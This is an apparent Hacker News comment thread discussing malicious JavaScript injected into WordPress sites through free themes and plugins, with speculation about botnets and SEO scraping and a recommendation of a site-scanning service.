I have a Wordpress plugin with ~100k active installs. Recently I've started getting emails from people wanting to buy the plugin from me. I'm assuming they want it for a botnet or other nefarious purposes. I'm not sure if Wordpress have stepped up their monitoring of plugins or not, but in past there was little oversight of the plugins and adding a direct backdoor to those 100k servers would be trivial, not to mention the millions of people that could be reached via JavaScript injection.
This is the whole reason Sucuri [1] exists and blew up in popularity shortly after it launched. If you are running Wordpress, I'd definitely recommend Sucuri.<p>If you don't have a paid plan, at least run the free scan once a month or more to make sure you weren't hit by anything. I don't mind Wordpress as a CMS, but it is a <i></i>constant<i></i> target. Constant. And nothing looks worse than having "Cheap Canadian Viagra" at the bottom of your corporate website.<p>[1] <a href="https://sucuri.net/" rel="nofollow">https://sucuri.net/</a>
tl;dr <i>Someone hacks WordPress websites and includes strange .js files that a) lead to fake Flash downloads that install a botnet on your PC and b) abuse your browser to get URLs from a Google search.</i>
I wonder if the point of the botnet is to get SERPs from Google? They stopped letting you know quite a bit of information about keyowrds, rankings, etc. a while ago.<p>Seems like there is lots of potential for blackhat SEO with this type of botnet.
The domain hosting one of the files seemed too legit to me, so I checked and it's an actual website of a Brazilian company,<a href="http://cjccontabil.com.br/" rel="nofollow">http://cjccontabil.com.br/</a>, seems whoever built the website got a WP (free I assume)theme from somewhere which happened to include this malicious file(/wp-content/themes/Hermes/main1.js). I guess folks are downloading free stuff and hosting them at their websites without inspecting the content of all files, so if you think you're safe by just making sure your system is injection-proof, think again, are you using some theme or plugin downloaded from somewhere on the web and if so have you checked every single file included?
Wow, this one infected at least 1.000+ sites according to Meanpath¹.<p>[1] <a href="http://meanpath.com/f/j5LK9K" rel="nofollow">http://meanpath.com/f/j5LK9K</a>